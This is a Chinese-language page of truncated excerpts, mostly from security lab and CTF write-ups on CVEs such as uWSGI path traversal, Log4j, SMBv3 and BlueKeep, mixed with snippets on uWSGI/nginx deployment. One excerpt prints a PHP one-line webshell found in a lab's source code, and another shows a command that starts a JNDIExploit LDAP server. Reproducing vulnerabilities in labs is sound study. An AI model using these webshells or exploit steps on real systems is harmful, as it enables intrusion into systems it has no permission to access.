0x01漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI.uwsgi和http等协议.uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测.攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件. 0x02 漏洞编号 CVE-2018-7490 0x03 影响版本 Debian Debian_linux:8.0 Debian Debian_linux:9.0 0x04 靶场演练 http://219…
申请靶场环境后 点开题目 一段奇怪的PHP代码 因为我自己电脑重装了win10系统,php+apache+mysql的环境本地主机觉得没必要弄了,于是我们用在线的PHP编码(百度一下到处都是) 复制进去以":"来排个格式 运行下,报错. 看看源码,"$_"     "$__"     "$___" 这三个是变量名,我们用echo输出下内容 连在一起了,但是可以确定 $_ => 1 $__ => _GET $___…
前言 关于这个漏洞,啥都不用说了,直接发车. 工具下载 JNDIExploit:https://github.com/0x727/JNDIExploit 复现过程 启动靶场环境 直接用vulfocus启一个环境. 官网地址:http://vulfocus.fofa.so/ ​ 没注册的先注册,进来首页即可看到靶场 用JNDIExploit启一个ldap的服务. 命令如下: java -jar JNDIExploit-1.3-SNAPSHOT.jar -l 1234 -p 8988 -i 0.0.…
CVE­-2020-­0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品,Microsoft Windows是一套个人设备使用的操作系统,Microsoft Windows Server是一套服务器操作系统,Server Message Block是其中的一个服务器信息传输协议. 微软公布了在Server Message Block 3.0(SMBv3)中发现的“蠕虫型…
地址:https://www.mozhe.cn/bug/detail/SW5ObnVFa05vSHlmTi9pcWhRSjRqZz09bW96aGUmozhe 在靶场中找到内容 解密 访问直接得key…
一.访问链接 二.下载系统源码后直接放到D盾里扫描,扫到后门文件 三.查看该木马文件 <?php error_reporting(0); $_GET['POST']($_POST['GET']);?> 1.error_reporting(0);      关闭错误报告 2.$_GET['POST']($_POST['GET']);     一句话木马,GET传入POST值,再将密码:GET以POST请求方式传到后台 因此构造payload:http://219.153.49.228:41996…
{ # Django api use uwsgi location /api/ { # /api/hello ==> /hello rewrite ^/api/(.*) /$1 break; #关键是这行做替换 留意最后面是 break; include uwsgi_params; uwsgi_pass 127.0.0.1:8001; uwsgi_read_timeout 5; } # Django static location /api/static/ { alias /srv/Django…
uWSGI是一个Web服务器,它实现了WSGI协议.uwsgi.http等协议.Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换.WSGI是一种Web服务器网关接口.它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范. 目标: 了解uWSGI CVE-2018-7490漏洞形成原理和漏洞利用方法. 利用搜索工具了解CVE-2018-7490漏洞详情.再利用漏洞获取根目录key.txt的值. 解析思路http…
CVE®是一份公开披露的网络安全漏洞列表, 官方地址为 : https://cve.mitre.org/cve/ 比如 mavenrepository 上阿里的Druid修复的漏洞的列表如下:…
CVE-2019-0708 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708.攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息.执行远程代码.发起拒绝服务攻击等等攻击行为.而更加严重的是,这个漏洞的触发无需用户交互,攻击者可以用该漏洞制作堪比2017年席卷全球的WannaCry类蠕虫病毒,从而进行大规模传播和破坏. 影响范围 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windo…
PART 1 参考链接:https://blog.csdn.net/qq_42184699/article/details/90754333 漏洞介绍: 当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞.此漏洞是预身份验证,无需用户交互.成功利用此漏洞的攻击者可以在目标系统上执行任意代码.攻击者可随后安装程序:查看.更改或删除数据:或者创建拥有完全用户权限的新帐户. payload:https://github…
Access数据库注入 前言:在常见的注入测试中,由于每个数据库内置架构和应用不同,导致数据库类型将决定注入的手法,Access数据库是小型数据库类型,普遍用于小型WEB应用,其中Access注入手法也相对于较为简单. 第一点:比较Mysql结构及功能 Mysql数据库 数据库A zblog = www.zblog.com 表名 列名 数据 数据库B dede = www.dede.com 表名 列名 数据 ACCESS数据库(只有一个数据库,不存在多个,适合小型网站) 表名 列名 数据 功能:…
package :openjpeg2 相关CVE ID: CVE-2017-17480 CVE-2018-5785 CVE-2018-6616 CVE-2018-14423 CVE-2018-18088 Debian Bug: 884738 888533 889683 904873 910763 在openjpeg2(开放源代码的jpeg2000编解码器)中发现了多个漏洞,可能会导致拒绝服务或远程代码执行. cve - 2017 - 17480 在jp3d和jpwl编码器中编写堆栈缓冲区溢出-可…
本文主题主要是分析CVE-2019-16278漏洞原因.漏洞如何利用以及为什么会受到攻击.这个CVE跟Nostromo Web服务器(又名nhttpd)有关,这个组件是在FreeBSD,OpenBSD等Unix系统上非常流行的开源Web服务器. Nostromo无法验证URL,导致可以通过路径遍历系统中的任何文件.没有通过身份验证的攻击者可以强制服务器指向/bin/sh之类的shell文件并执行任意命令.由于所有Nostromo的版本(包括最新版本1.9.6)都很容易受到攻击,甚至其开发人员的网…
前言 小白,记录,有问题可以交流 乖乖放上参考链接: https://www.freebuf.com/column/221947.html https://www.sec-un.org/java代码审计入门篇:webgoat-8(初见)/ https://blog.csdn.net/qq_45836474/article/details/108021657 搭建流程 前提: Java 11 Maven > 3.2.1 IDEA 下载源码 git clone https://github.com/…
作者:Dennis Brinkrolf 译者:豌豆花下猫@Python猫 原题:10 Unknown Security Pitfalls for Python 英文:https://blog.sonarsource.com/10-unknown-security-pitfalls-for-python 声明:本翻译是出于交流学习的目的,基于 CC BY-NC-SA 4.0 授权协议.为便于阅读,内容略有改动. Python 开发者们在使用标准库和通用框架时,都以为自己的程序具有可靠的安全性.然而…
2018年Windows漏洞年度盘点丨老漏洞经久不衰,新0day层出不穷 腾讯电脑管家2019-02-12共17875人围观 ,发现 1 个不明物体网络安全资讯 https://www.freebuf.com/news/195195.html 前言 漏洞是影响网络安全的重要因素,而漏洞攻击作为恶意攻击的最常用手段,更是有着目标行业化.手段多样化的趋势,不论是个人还是企业,都面临着严峻的漏洞威胁. 2018年在轰动式的“幽灵”.“熔断”两大CPU漏洞中揭开序幕.“震网3漏洞利用挖矿”.“ 412挂…
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行.每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag.网址:https://www.vulnhub.com 吧下面代码复制另存为后缀为.html文件打开就可以正常访问了 <!doctype html> <html> <head&…
之前完成了贴吧签到系统的搭建,笔者想将这个功能分享给更多人使用,所以尝试搭建了一个网页,一路遇到了很多问题,最终解决了,记录下过程分享给大家 首先安装 uWSGI ,和 Nginx 配套使用,具体用途自行查阅(已配置Python3环境) pip3 install uwsgi 新建一个 uWSGI 的配置文件,路径自选,笔者配置文件路径为 /root/uwsgi.ini ,项目路径为 /root/flask ,配置文件内容如下 [uwsgi] socket = processes = thread…
1.CH4INRULZ_v1.0.1靶场通关 ch4inrulz是vulnhub下的基于Linux的一个靶场,作为练习之用 目的:通过各种手段,获取到靶机内的flag的内容 2.环境搭建: 攻击机 Kali 192.168.31.51 靶机 Ubuntu 192.168.31.128 2.1下载CH4INRULZ_v1.0.1靶场,地址:https://download.vulnhub.com/ch4inrulz/CH4INRULZ_v1.0.1.ova 2.2将下载好的.ova扩展名的文件,直…
在一些文章和报道中常常提到安全漏洞CVE-1999-1046这样的CVE开头的漏洞编号,这篇文章将常见的漏洞ID的表示方法做下介绍: 1.以CVE开头,如CVE-1999-1046这样的 CVE 的英文全称是"Common Vulnerabilities & Exposures"公共漏洞和暴露.CVE就好像是一个字典表,为广泛认同的信息安全漏洞或者已经暴露出来的弱点给出一个公共的名称.使用一个共同的名字,能够帮助用户在各自独立的各种漏洞数据库中和漏洞评估工具中共享数据,尽管这些…
Nginx+uWSGI+Djangoi开发环境搭建 Django简介,环境搭建 uWSGI简介,安装与配置 Nginx安装与配置 Nginx+uWSGI+Django原理解析 1.django简介,环境搭建 django简介 Django 是用Python开发的一个免费开源的Web框架,可以用于快速搭建高性能,优雅的网站! Django 中提供了开发网站经常用到的模块,常见的代码都为你写好了,通过减少重复的代码,Django 使你能够专注于 web 应用上有 趣的关键性的东西. Django的理…
去掉敏感信息后的不完整版 ==========================================================================2018年12月29日 记录: 目前在维护的最低PHP版本只有5.6了:1.5.6.39版本convert.quoted-printable-encode过滤器时核心的segfault错误imap扩展的错误phar扩展的错误,PharData类提供了一个访问和创建不可执行的tar和zip存档的高级接口5.6.38版本apac…
注:本文仅供学习使用,请勿用于非法操作,后果与作者无关!!! 一.简介 upload-labs是一个使用php语言编写的,专门收集渗透测试过程中遇到的各种上传漏洞的靶场.旨在帮助大家对上传漏洞有一个全面的了解.目前一共19关,每一关都包含着不同上传方式. 二.安装 upload-labs 由于upload-labs 是一个由php 语言编写的靶场,因此需要在php环境下进行使用. Windows 推荐集成环境Phpstudy下载:http://phpstudy.php.cn/ 下载安装即可:Li…
准备知识 1.django一个基于python的开源web框架,请确保自己熟悉它的框架目录结构. 2.uWSGI一个基于自有的uwsgi协议.wsgi协议和http服务协议的web网关 3.nginx常用高性能代理服务器 4.wsgi.pydjango项目携带的一个wsgi接口文件如果项目名叫mysite的话,此文件就位于[/mysite/mysite/wsgi.py] 相关资料 wsgi:一种实现python解析的通用接口标准/协议,是一种通用的接口标准或者接口协议,实现了python web…
导论 WSGI是Web服务器网关接口.它是一个规范,描述了Web服务器如何与Web应用程序通信,以及Web应用程序如何链接在一起以处理一个请求,(接收请求,处理请求,响应请求) 基于wsgi运行的框架有bottle,DJango,Flask,用于解析动态HTTP请求 支持WSGI的服务器 wsgiref python自带的web服务器 Gunicorn 用于linux的 python wsgi Http服务器,常用于各种django,flask结合部署服务器. mode_wsgi 实现了Apac…
1.pip3 install uwsgi,项目目录路径:/data/my_env1/monitor1/,项目名:monitor1,app名:show 测试启动: ln -s /data/linkdood/im/vrv/python36/bin/uwsgi /user/bin/uwsgi uwsgi --http 192.168.165.10:8000 --file monitor1/wsgi.py --static-map=/static=static 访问http://192.168.165.…
1. 在开发机上的准备工作 2. 在服务器上的准备工作 3.安装uwsgi 4.编写uwsgi配置文件,使用配置文件启动uwsgi 5. 安装nginx 6. 收集静态文件 7. 编写nginx配置文件: 8. 使用supervisor配置 1. 在开发机上的准备工作 确认项目没有bug. 用pip freeze > requirements.txt将当前环境的包导出到requirements.txt文件中,方便在部署的时候安装. 将项目上传到服务器上的/srv目录下.这里以git的形式为例,打…
目录 安装使用uWSGI 配置Nginx结合uWSGI supervisor Django静态文件与Nginx配置 @ *** 所谓WSGI . WSGI是Web服务器网关接口,它是一个规范,描述了Web服务器如何与Web应用程序通信,以及如何与Web应用程序链接在一起处理一个请求(接收请求.处理请求.响应请求). . 基于wsgi运行的框架有Bottle.Django.Flask,用于解析动态HTTP请求. . ---------⬇️ 支持WSGI的服务器 . wsgiref Python自带…
记录下自己写的经典Web漏洞靶场的write up,包括了大部分的经典Web漏洞实战场景,做个笔记. 0x01 任意文件下载漏洞 if(!empty($_GET['filename'])){ $filename = $_GET['filename']; $fileinfo = pathinfo($filename); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition…